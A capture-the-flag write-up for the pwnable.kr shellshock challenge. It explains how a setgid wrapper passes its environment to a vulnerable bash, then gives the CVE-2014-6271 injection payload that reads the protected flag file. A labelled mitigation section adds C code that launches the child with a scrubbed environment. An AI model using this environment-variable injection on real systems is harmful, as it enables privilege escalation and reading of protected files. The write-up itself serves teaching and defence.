shellshock-writeup-pwnable.kr: the shell vulnerability

Challenge description:

Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure :)

ssh shellshock@pwnable.kr -p2222 (pw:guest)

Directory listing and permissions:

shellshock@ubuntu:~$ ls -l
total 960
-r-xr-xr-x 1 root shellshock 959120 Oct 12 2014 bash
-r--r----- 1 root shellshock_pwn 47 Oct 12 2014 flag
-r-xr-sr-x 1 root shellshock_pwn 8547 Oct 12 2014 shellshock
-r--r--r-- 1 root root 188 Oct 12 2014 shellshock.c

Source code:

shellshock@ubuntu:~$ cat shellshock.c
#include <stdio.h>
int main(){
setresuid(getegid(), getegid(), getegid());
setresgid(getegid(), getegid(), getegid());
system("/home/shellshock/bash -c 'echo shock_me'");
return 0;
}

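The hint mentions "shocking news", so it has to be something big, such as a newly disclosed serious vulnerability. Searching for "bash vulnerability" does indeed turn up the bash vulnerability.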

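That page gives a test: env x='() { :;}; echo vulnerable' bash -c "echo this is a test". If the output contains the text after the first echo (vulnerable), the bash is affected. That makes this easy: shellshock is setgid shellshock_pwn and passes its environment on to /home/shellshock/bash through system(), so we can cat the flag directly.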

PoC & flag:

shellshock@ubuntu:~$ env x='() { :;}; /bin/cat flag' bash -c "./shellshock"
only if I knew CVE-2014-6271 ten years ago..!!
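
The mitigation side of shellshock.c, as an added example that is not part of the original post or the challenge: a privileged wrapper that starts its child with execve() and a fixed environment instead of system(), so a caller-supplied variable such as x never reaches the shell. The names run_with_clean_env and child_sees_var, the clean_env values, and the use of /bin/sh in place of /home/shellshock/bash are assumptions made so the code runs anywhere.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Fixed, minimal environment for the child (values are assumptions).
 * Nothing from the caller, such as x='() { :;}; ...', is passed on. */
static char *const clean_env[] = { "PATH=/usr/bin:/bin", "LANG=C", NULL };

/* Run argv[0] with clean_env instead of the inherited environment.
 * Returns the child's exit status (127 if exec failed), -1 on error. */
int run_with_clean_env(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, clean_env);  /* no shell wrapper, no caller env */
        _exit(127);                        /* only reached if execve failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Hypothetical demo helper: returns 1 if the variable `name` is set
 * inside a child started by run_with_clean_env, 0 if it was scrubbed. */
int child_sees_var(const char *name)
{
    char script[128];
    snprintf(script, sizeof script, "[ -n \"${%s+set}\" ]", name);
    char *const argv[] = { "/bin/sh", "-c", script, NULL };
    return run_with_clean_env(argv) == 0;
}

int main(void)
{
    /* Constructed input: the probe string quoted in the write-up. */
    setenv("x", "() { :;}; echo vulnerable", 1);
    printf("x visible in child: %s\n", child_sees_var("x") ? "yes" : "no");
    /* Same command the challenge runs, but with the scrubbed environment. */
    char *const argv[] = { "/bin/sh", "-c", "echo shock_me", NULL };
    return run_with_clean_env(argv);
}
```

Scrubbing the environment is defense in depth for setuid/setgid programs; the underlying fix for CVE-2014-6271 is a patched bash.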
# CTF, PWN
